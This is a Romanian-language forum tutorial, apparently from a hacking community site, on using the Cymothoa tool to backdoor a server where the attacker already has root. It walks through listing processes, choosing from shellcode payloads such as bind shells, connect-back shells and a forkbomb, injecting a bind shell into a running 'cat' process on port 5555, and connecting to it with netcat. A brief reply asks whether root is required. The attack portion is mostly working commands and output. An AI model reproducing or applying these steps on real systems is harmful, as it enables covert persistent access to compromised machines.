Jump to content

Official HackingCampus Chat > https://discord.gg/e6DSwy3


Tutorial: Cymothoa Backdoor

Recommended Posts

Salut tuturor! Doresc sa vorbesc azi despre un backdoor tool care ne va permite sa cream un backdoor intr-un server la care avem deja root, ajutandu-ne efectiv sa avem o usa de intrare in acel server.

Acest backdoor tool se numeste Cymothoa si se gaseste deja in Kali Linux sau Backtrack, dar pentru care cei care nu il au, pot sa il descarce de aici: https://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/


Vom incepe prin a rula toate procesele care exista in server pentru a vedea ce am putea infecta -


[email protected]:~# ps -A | tail

4915 ? 00:00:00 krandrtray
4928 ? 00:00:00 knotify
4967 ? 00:00:01 konqueror
6674 ? 00:00:00 konsole
6675 pts/1 00:00:00 bash
6684 pts/1 00:00:00 cat
6685 ? 00:00:00 konsole
6686 pts/2 00:00:00 bash
6696 pts/2 00:00:00 ps
6697 pts/2 00:00:00 tail


Pentru a ilustra cum folosim tool'ul, vom ataca un "cat" vector/proces cu un pid 6684.

Dar inainte putem vedea si alege un parazit anume pe care il putem folosi sa atacam/infectam:


[email protected]:~# ./cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <[email protected]>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford ([email protected])
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - [email protected] [email protected]
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - [email protected]
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs ([email protected])
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd


In acest exemplu vom folosi al doilea shellcode, cel care uneste parazitul cu conexiunea noastra TCP. Atacul va arata asa:


[email protected]:~# ./cymothoa -p 6684 -s 1 -y 5555

[+] attaching to process 6684

register info:

eax value: 0xfffffe00 ebx value: 0×0
esp value: 0xbfed7208 eip value: 0xffffe424

[+] new esp: 0xbfed7204
[+] injecting code into 0xb7f4d000
[+] copy general purpose registers
[+] detaching from 6684

[+] infected!!!


Tool'ul ne spune ca a reusit sa infecteze procesul "cat" pe care l-am ales mai devreme. Daca vom tasta din nou ca la inceput vom vedea cel deal doilea "cat":


[email protected]:~# ps -A | tail

 6674 ? 00:00:00 konsole
 6675 pts/1 00:00:00 bash
 6684 pts/1 00:00:00 cat <-- original process
 6717 pts/1 00:00:00 cat <-- backdoor
 6718 pts/2 00:00:00 ps
 6719 pts/2 00:00:00 tail


Ultimul lucru pe care il putem face este sa ne conectam la el folosind netcat:


[email protected]:~# nc -vv localhost 5555

localhost [] 5555 (?) open
uname -a
Linux bt #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux


Si suntem conectati la backdoor'ul nostru creat!

Alt exemplu:


Share this post

Link to post
Share on other sites
On 7/7/2018 at 5:01 PM, The-Angel said:

salut... intrebare... doar pt user root se poate? sau si pentru alte usere?


Doar cu root merge din cate stiu eu. Desigur poti incerca pe un cont de admin simplu sa vezi daca merge si poti sa ne spui aici. 

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...